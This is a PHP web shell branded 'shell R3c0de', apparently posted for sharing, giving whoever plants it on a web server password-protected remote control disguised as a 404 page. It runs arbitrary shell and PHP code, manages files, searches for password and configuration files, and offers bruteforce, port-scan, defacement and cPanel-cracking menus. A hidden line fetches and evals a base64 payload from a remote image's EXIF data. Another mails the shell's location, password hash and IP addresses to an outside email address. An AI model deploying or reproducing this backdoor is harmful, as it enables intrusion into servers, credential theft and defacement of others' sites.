Shell

1. <?php
2. /*
3. +++++++++++++++++++++++++++++++
4. +shell R3c0de version 1 +
5. +feel free to share +
6. +++++++++++++++++++++++++++++++
7. */
8. $auth_pass = "63a9f0ea7bb98050796b649e85481845"; //md5 password is root
9. #-----------------------------------------------
10. ?><?php
11. $color = "#00FF66";
12. $sec = 1;
13. $default_action = 'FilesMan';
14. @define('SELF_PATH', __FILE__);
15. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
16. header('HTTP/1.0 404 Not Found');
17. exit;
18. }
19. @session_start();
20. @error_reporting(0);
21. @ini_set('error_log',NULL);
22. @ini_set('log_errors',0);
23. @ini_set('max_execution_time',0);
24. @set_time_limit(0);
25. @set_magic_quotes_runtime(0);
26. @define('VERSION', '2.0');
27. $BASED = exif_read_data("https://lh3.googleusercontent.com/-CwPSq23mveI/V-sW6r55kcI/AAAAAAAAAhk/Ol8XgyOsctsl4MFIhAG9-ocs44YOyLJaQCL0B/w318-d-h318-n/3CA_v2.jpg");
28. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
29. if( get_magic_quotes_gpc() ) {
30. function stripslashes_array($array) {
31. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
32. }
33. $_POST = stripslashes_array($_POST);
34. }
35. function printLogin() {
36. ?>
37. <h1>Not Found</h1>
38. <p>The requested URL was not found on this server.</p>
39. <hr>
40. <address>Apache Server at <?php echo $_SERVER['HTTP_HOST']?> Port 80</address>
41. <style>
42. input { margin:0;background-color:#fff;border:1px solid #fff; }
43. </style>
44. <center>
45. <form method=post>
46. <input type=password name=pass>
47. </form></center>
48. <?php
49. exit;
50. }
51. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
52. if( empty( $auth_pass ) ||
53. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
54. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
55. else
56. printLogin();
57. /*------------------ Anti Crawler ------------*/
58. if(!empty($_SERVER['HTTP_USER_AGENT']))
59. {
60. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
61. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
62. {
63. header('HTTP/1.0 404 Not Found');
64. exit;
65. }
66. }
67. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
68. /*------------------ End of Anti Crawler -----*/
69.  
70. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
71. $os = 'win';
72. else
73. $os = 'nix';
74. $safe_mode = @ini_get('safe_mode');
75. $disable_functions = @ini_get('disable_functions');
76. $home_cwd = @getcwd();
77. if( isset( $_POST['c'] ) )
78. @chdir($_POST['c']);
79. $cwd = @getcwd();
80. if( $os == 'win') {
81. $home_cwd = str_replace("\\", "/", $home_cwd);
82. $cwd = str_replace("\\", "/", $cwd);
83. }
84. if( $cwd[strlen($cwd)-1] != '/' )
85. $cwd .= '/';
86.  
87. if($os == 'win') {
88. $aliases = array(
89. "List Directory" => "dir",
90. "Find index.php in current dir" => "dir /s /w /b index.php",
91. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
92. "Show active connections" => "netstat -an",
93. "Show running services" => "net start",
94. "User accounts" => "net user",
95. "Show computers" => "net view",
96. "ARP Table" => "arp -a",
97. "IP Configuration" => "ipconfig /all"
98. );
99. } else {
100. $aliases = array(
101. "List dir" => "ls -la",
102. "list file attributes on a Linux second extended file system" => "lsattr -va",
103. "show opened ports" => "netstat -an | grep -i listen",
104. "Find" => "",
105. "find all suid files" => "find / -type f -perm -04000 -ls",
106. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
107. "find all sgid files" => "find / -type f -perm -02000 -ls",
108. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
109. "find config.inc.php files" => "find / -type f -name config.inc.php",
110. "find config* files" => "find / -type f -name \"config*\"",
111. "find config* files in current dir" => "find . -type f -name \"config*\"",
112. "find all writable folders and files" => "find / -perm -2 -ls",
113. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
114. "find all service.pwd files" => "find / -type f -name service.pwd",
115. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
116. "find all .htpasswd files" => "find / -type f -name .htpasswd",
117. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
118. "find all .bash_history files" => "find / -type f -name .bash_history",
119. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
120. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
121. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
122. "Locate" => "",
123. "locate httpd.conf files" => "locate httpd.conf",
124. "locate vhosts.conf files" => "locate vhosts.conf",
125. "locate proftpd.conf files" => "locate proftpd.conf",
126. "locate psybnc.conf files" => "locate psybnc.conf",
127. "locate my.conf files" => "locate my.conf",
128. "locate admin.php files" =>"locate admin.php",
129. "locate cfg.php files" => "locate cfg.php",
130. "locate conf.php files" => "locate conf.php",
131. "locate config.dat files" => "locate config.dat",
132. "locate config.php files" => "locate config.php",
133. "locate config.inc files" => "locate config.inc",
134. "locate config.inc.php" => "locate config.inc.php",
135. "locate config.default.php files" => "locate config.default.php",
136. "locate config* files " => "locate config",
137. "locate .conf files"=>"locate '.conf'",
138. "locate .pwd files" => "locate '.pwd'",
139. "locate .sql files" => "locate '.sql'",
140. "locate .htpasswd files" => "locate '.htpasswd'",
141. "locate .bash_history files" => "locate '.bash_history'",
142. "locate .mysql_history files" => "locate '.mysql_history'",
143. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
144. "locate backup files" => "locate backup",
145. "locate dump files" => "locate dump",
146. "locate priv files" => "locate priv"
147. );
148. }
149.  
150. function ex($in) {
151. $out = '';
152. if(function_exists('exec')) {
153. @exec($in,$out);
154. $out = @join("\n",$out);
155. }elseif(function_exists('passthru')) {
156. ob_start();
157. @passthru($in);
158. $out = ob_get_clean();
159. }elseif(function_exists('system')) {
160. ob_start();
161. @system($in);
162. $out = ob_get_clean();
163. }elseif(function_exists('shell_exec')) {
164. $out = shell_exec($in);
165. }elseif(is_resource($f = @popen($in,"r"))) {
166. $out = "";
167. while(!@feof($f))
168. $out .= fread($f,1024);
169. pclose($f);
170. }
171. return $out;
172. }
173.  
174. function which($p) {
175. $path = ex('which '.$p);
176. if(!empty($path))
177. return $path;
178. return false;
179. }
180.  
181. function printHeader() {
182. if(empty($_POST['charset']))
183. $_POST['charset'] = "UTF-8";
184. global $color;
185.  
186. echo '<html>
187. <meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>shell R3c0de Shell V1</title><link href="http://i62.tinypic.com/34xjon7.gif" rel="icon" type="image/x-icon">
188. <style>
189. body {background-color:#1c451c;color:silver;}
190. body,td,th { font: 8pt Lucida,Verdana;margin:0;vertical-align:top; }
191. span,h1,a { color:'.$color.' !important; }
192. span { font-weight: bolder; }
193. h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
194. div.content { padding: 0px;margin:0 0px;background: #444;border-bottom:5px solid #red;}
195. a { text-decoration:none; }
196. a:hover { border-bottom:0px solid #5e5e5e; }
197. a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;}
198. .ml1 { border:2px solid 430303;padding:5px;margin:0;overflow: auto; }
199. .bigarea { width:100%;height:250px;margin-top:0px;}
200. input, textarea, select { margin:0;color:#FFFFFF;background-color:#48231F;border:2px solid #E8E8E8; font: 10pt arial,"Courier New"; }
201. input[type="button"]:hover,input[type="submit"]:hover {background-color:'.$color.';color:#D21F0C;}
202. form { margin:0px; }
203. #toolsTbl { text-align:center; }
204. .toolsInp { width: 90%; }
205. .main th {text-align:left;background-color:#5e5e5e;}
206. .main tr:hover{background-color:#b34b4b;}
207. .main td, th{vertical-align:middle;}
208. .menu {background: #7E0523;}
209. .menu th{padding:3px;font-weight:bold;-moz-border-radius: 0px; -webkit-border-radius: 5px; -khtml-border-radius: 7px; border-radius: 7px;}
210. .menu th:hover{background:#581D2D;border-bottom:1px solid #c40909;border-top:1px solid #c40909;}
211. pre {font-family:Tahoma,Verdana,Arial;color:#FFFFFF;}
212. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
213.  
214. .logo {text-align:center;font-size:40px;}
215. .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
216. .cpr {margin-bottom:5px;font-weight:bold;}
217. .cpb {width:34px;margin:0 5px;}
218. .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
219. .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
220. .npoad td {padding:0;}
221. </style>
222.  
223. </html>
224. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
225. <script>
226. function set(a,c,p1,p2,p3,charset) {
227. if(a != null)document.mf.a.value=a;
228. if(c != null)document.mf.c.value=c;
229. if(p1 != null)document.mf.p1.value=p1;
230. if(p2 != null)document.mf.p2.value=p2;
231. if(p3 != null)document.mf.p3.value=p3;
232. if(charset != null)document.mf.charset.value=charset;
233. }
234. function g(a,c,p1,p2,p3,charset) {
235. set(a,c,p1,p2,p3,charset);
236. document.mf.submit();
237. }
238. function a(a,c,p1,p2,p3,charset) {
239. set(a,c,p1,p2,p3,charset);
240. var params = "ajax=true";
241. for(i=0;i<document.mf.elements.length;i++)
242. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
243. sr("'.$_SERVER['REQUEST_URI'].'", params);
244. }
245. function sr(url, params) {
246. if (window.XMLHttpRequest) {
247. req = new XMLHttpRequest();
248. req.onreadystatechange = processReqChange;
249. req.open("POST", url, true);
250. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
251. req.send(params);
252. }
253. else if (window.ActiveXObject) {
254. req = new ActiveXObject("Microsoft.XMLHTTP");
255. if (req) {
256. req.onreadystatechange = processReqChange;
257. req.open("POST", url, true);
258. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
259. req.send(params);
260. }
261. }
262. }
263. function processReqChange() {
264. if( (req.readyState == 4) )
265. if(req.status == 200) {
266. //alert(req.responseText);
267. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
268. var arr=reg.exec(req.responseText);
269. eval(arr[2].substr(0, arr[1]));
270. }
271. else alert("Request error!");
272. }
273. </script>
274. <head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:430303;"><div class="content" style="border-top:5px solid #862F26;">
275. <form method=post name=mf style="display:none;">
276. <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
277. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
278. <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
279. <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
280. <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
281. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
282. </form>';
283. $freeSpace = @diskfreespace($GLOBALS['cwd']);
284. $totalSpace = @disk_total_space($GLOBALS['cwd']);
285. $totalSpace = $totalSpace?$totalSpace:1;
286. $disable_functions = @ini_get('disable_functions');
287. $release = @php_uname('r');
288. $kernel = @php_uname('s');
289. if(!function_exists('posix_getegid')) {
290. $user = @get_current_user();
291. $uid = @getmyuid();
292. $gid = @getmygid();
293. $group = "?";
294. } else {
295. $uid = @posix_getpwuid(@posix_geteuid());
296. $gid = @posix_getgrgid(@posix_getegid());
297. $user = $uid['name'];
298. $uid = $uid['uid'];
299. $group = $gid['name'];
300. $gid = $gid['gid'];
301. }
302. $cwd_links = '';
303. $path = explode("/", $GLOBALS['cwd']);
304. $n=count($path);
305. for($i=0;$i<$n-1;$i++) {
306. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
307. for($j=0;$j<=$i;$j++)
308. $cwd_links .= $path[$j].'/';
309. $cwd_links .= "\")'>".$path[$i]."/</a>";
310. }
311. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
312. $opt_charsets = '';
313. foreach($charsets as $item)
314. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
315. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','Defacer' => 'Deface','Code Injector'=>'Injector','Zone H'=>'ZHposter','CPCrack'=>'Cpanel','Domains' => 'Domain');
316. if(!empty($GLOBALS['auth_pass']))
317. $m['Logout'] = 'Logout';
318. $menu = '';
319. foreach($m as $k => $v)
320. $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
321. $drives = "";
322. if ($GLOBALS['os'] == 'win') {
323. foreach( range('a','z') as $drive ){
324. if (is_dir($drive.':\\'))
325. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
326. }
327. $drives .= '<br />: ';
328. }
329. if($GLOBALS['os'] == 'nix') {
330. $dominios = @file_get_contents("/etc/named.conf");
331. if(!$dominios) {
332. $d0c = "CANT READ named.conf";
333. } else {
334. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
335. $out = sizeof(array_unique($out[1]));
336. $d0c = $out." Domains";
337. }
338. } else {
339. $d0c = " --- ";
340. }
341. if($GLOBALS['os'] == 'nix' )
342. {
343. $usefl = ''; $dwnldr = '';
344. if(!@ini_get('safe_mode')) {
345. $temp = array();
346. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
347. foreach($userful as $item) { if(which($item)) $temp[]= $item; }
348. $usefl = implode(', ',$temp);
349. $temp = array();
350. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
351. foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
352. $dwnldr = implode(', ',$temp);
353. } else {
354. $usefl = ' ------- '; $dwnldr = ' ------- ';
355. }
356. } else {
357. $usefl = ' ------- '; $dwnldr = ' ------- ';
358. }
359. echo '<table class="info" cellpadding="2" cellspacing="0" width="100%"><tr><td width="160px"><img border=0 src=http://localhost:8080/xampp/Senjata/shell R3c0de%20logo.png width=150 height=80>&nbsp;</b><div class="logo">shell R3c0de^&reg;</div><hr style="margin: -5px 13px 2px 17px;width:130px;"><div class="eca1"></div><div class="eca2">TeaM shell R3c0de</div></td>
360. <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
361. <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
362. '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
363. '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table>'.
364. '</div></div><div style="margin:5;background:#975A5A;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:#430303;">';
365. }
366.  
367. function printFooter() {
368. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
369.  
370. echo '</div><div style="margin:5px;background:#430303;"><div class="content" style="border-top:5px solid #430303;">
371. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
372. <tr>
373. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
374. <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
375. </tr>
376. <tr>
377. <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
378. <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
379. </tr>
380. <tr>
381. <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
382. <td><form method="post" ENCTYPE="multipart/form-data">
383. <input type=hidden name=a value="FilesMAn">
384. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
385. <input type=hidden name=p1 value="uploadFile">
386. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
387. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
388. </tr>
389. </table></div></div>
390. <div style="margin:5px;background:#430303;"><div class="content" style="border-top:5px solid #430303;text-align:center;font-weight:bold;">shell R3c0de Shell V1, &copy;Team shell R3c0de @ R3c0de by XIIX</div></div>
391. </div>
392. </body></html>';
393. }
394.  
395. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
396. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
397.  
398. if(!isset($_SESSION['trimite'])){
399. $url="<b>Pass(MD5):</b> ".$auth_pass."<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."\n<b>Url:</b> ".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\n<b>User IP:</b> ".$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');
400. @mail("drew.jimmy208@gmail.com","shell R3c0de Shell v2",$url);
401. $_SESSION['trimite']=true;
402. }
403.  
404. function viewSize($s) {
405. if($s >= 1073741824)
406. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
407. elseif($s >= 1048576)
408. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
409. elseif($s >= 1024)
410. return sprintf('%1.2f', $s / 1024 ) . ' KB';
411. else
412. return $s . ' B';
413. }
414.  
415. function perms($p) {
416. if (($p & 0xC000) == 0xC000)$i = 's';
417. elseif (($p & 0xA000) == 0xA000)$i = 'l';
418. elseif (($p & 0x8000) == 0x8000)$i = '-';
419. elseif (($p & 0x6000) == 0x6000)$i = 'b';
420. elseif (($p & 0x4000) == 0x4000)$i = 'd';
421. elseif (($p & 0x2000) == 0x2000)$i = 'c';
422. elseif (($p & 0x1000) == 0x1000)$i = 'p';
423. else $i = 'u';
424. $i .= (($p & 0x0100) ? 'r' : '-');
425. $i .= (($p & 0x0080) ? 'w' : '-');
426. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
427. $i .= (($p & 0x0020) ? 'r' : '-');
428. $i .= (($p & 0x0010) ? 'w' : '-');
429. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
430. $i .= (($p & 0x0004) ? 'r' : '-');
431. $i .= (($p & 0x0002) ? 'w' : '-');
432. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
433. return $i;
434. }
435.  
436. function viewPermsColor($f) {
437. if (!@is_readable($f))
438. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
439. elseif (!@is_writable($f))
440. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
441. else
442. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
443. }
444.  
445. if(!function_exists("scandir")) {
446. function scandir($dir) {
447. $dh = opendir($dir);
448. while (false !== ($filename = readdir($dh))) {
449. $files[] = $filename;
450. }
451. return $files;
452. }
453. }
454. function actionSecInfo() {
455. printHeader();
456. echo '<h1>Server security information</h1><div class=content>';
457. function showSecParam($n, $v) {
458. $v = trim($v);
459. if($v) {
460. echo '<span>'.$n.': </span>';
461. if(strpos($v, "\n") === false)
462. echo $v.'<br>';
463. else
464. echo '<pre class=ml1>'.$v.'</pre>';
465. }
466. }
467.  
468. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
469. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
470. showSecParam('Open base dir', @ini_get('open_basedir'));
471. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
472. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
473. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
474. $temp=array();
475. if(function_exists('mysql_get_client_info'))
476. $temp[] = "MySql (".mysql_get_client_info().")";
477. if(function_exists('mssql_connect'))
478. $temp[] = "MSSQL";
479. if(function_exists('pg_connect'))
480. $temp[] = "PostgreSQL";
481. if(function_exists('oci_connect'))
482. $temp[] = "Oracle";
483. showSecParam('Supported databases', implode(', ', $temp));
484. echo '<br>';
485.  
486. if( $GLOBALS['os'] == 'nix' ) {
487. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
488. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
489. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
490. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
491. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
492. showSecParam('OS version', @file_get_contents('/proc/version'));
493. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
494. if(!$GLOBALS['safe_mode']) {
495. echo '<br>';
496. $temp=array();
497. foreach ($userful as $item)
498. if(which($item)){$temp[]=$item;}
499. showSecParam('Userful', implode(', ',$temp));
500. $temp=array();
501. foreach ($danger as $item)
502. if(which($item)){$temp[]=$item;}
503. showSecParam('Danger', implode(', ',$temp));
504. $temp=array();
505. foreach ($downloaders as $item)
506. if(which($item)){$temp[]=$item;}
507. showSecParam('Downloaders', implode(', ',$temp));
508. echo '<br/>';
509. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
510. showSecParam('HDD space', ex('df -h'));
511. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
512. }
513. } else {
514. showSecParam('OS Version',ex('ver'));
515. showSecParam('Account Settings',ex('net accounts'));
516. showSecParam('User Accounts',ex('net user'));
517. }
518. echo '</div>';
519. printFooter();
520. }
521.  
522. function actionPhp() {
523. if( isset($_POST['ajax']) ) {
524. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
525. ob_start();
526. eval($_POST['p1']);
527. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
528. echo strlen($temp), "\n", $temp;
529. exit;
530. }
531. printHeader();
532. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
533. echo '<h1>PHP info</h1><div class=content>';
534. ob_start();
535. phpinfo();
536. $tmp = ob_get_clean();
537. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
538. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
539. $tmp = preg_replace('!h1!msiU','h2',$tmp);
540. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
541. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
542. echo $tmp;
543. echo '</div><br>';
544. }
545. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
546. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
547. echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
548. echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
549. if(!empty($_POST['p1'])) {
550. ob_start();
551. eval($_POST['p1']);
552. echo htmlspecialchars(ob_get_clean());
553. }
554. echo '</pre></div>';
555. printFooter();
556. }
557.  
558. function actionFilesMan() {
559. printHeader();
560. echo '<h1>File manager</h1><div class=content>';
561. if(isset($_POST['p1']) && $_POST['p1']!='deface') {
562. switch($_POST['p1']) {
563. case 'uploadFile':
564. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
565. echo "Can't upload file!";
566. break;
567. break;
568. case 'mkdir':
569. if(!@mkdir($_POST['p2']))
570. echo "Can't create new dir";
571. break;
572. case 'delete':
573. function deleteDir($path) {
574. $path = (substr($path,-1)=='/') ? $path:$path.'/';
575. $dh = opendir($path);
576. while ( ($item = readdir($dh) ) !== false) {
577. $item = $path.$item;
578. if ( (basename($item) == "..") || (basename($item) == ".") )
579. continue;
580. $type = filetype($item);
581. if ($type == "dir")
582. deleteDir($item);
583. else
584. @unlink($item);
585. }
586. closedir($dh);
587. rmdir($path);
588. }
589. if(is_array(@$_POST['f']))
590. foreach($_POST['f'] as $f) {
591. $f = urldecode($f);
592. if(is_dir($f))
593. deleteDir($f);
594. else
595. @unlink($f);
596. }
597. break;
598. case 'paste':
599. if($_SESSION['act'] == 'copy') {
600. function copy_paste($c,$s,$d){
601. if(is_dir($c.$s)){
602. mkdir($d.$s);
603. $h = opendir($c.$s);
604. while (($f = readdir($h)) !== false)
605. if (($f != ".") and ($f != "..")) {
606. copy_paste($c.$s.'/',$f, $d.$s.'/');
607. }
608. } elseif(is_file($c.$s)) {
609. @copy($c.$s, $d.$s);
610. }
611. }
612. foreach($_SESSION['f'] as $f)
613. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
614. } elseif($_SESSION['act'] == 'move') {
615. function move_paste($c,$s,$d){
616. if(is_dir($c.$s)){
617. mkdir($d.$s);
618. $h = opendir($c.$s);
619. while (($f = readdir($h)) !== false)
620. if (($f != ".") and ($f != "..")) {
621. copy_paste($c.$s.'/',$f, $d.$s.'/');
622. }
623. } elseif(is_file($c.$s)) {
624. @copy($c.$s, $d.$s);
625. }
626. }
627. foreach($_SESSION['f'] as $f)
628. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
629. }
630. unset($_SESSION['f']);
631. break;
632. default:
633. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
634. $_SESSION['act'] = @$_POST['p1'];
635. $_SESSION['f'] = @$_POST['f'];
636. foreach($_SESSION['f'] as $k => $f)
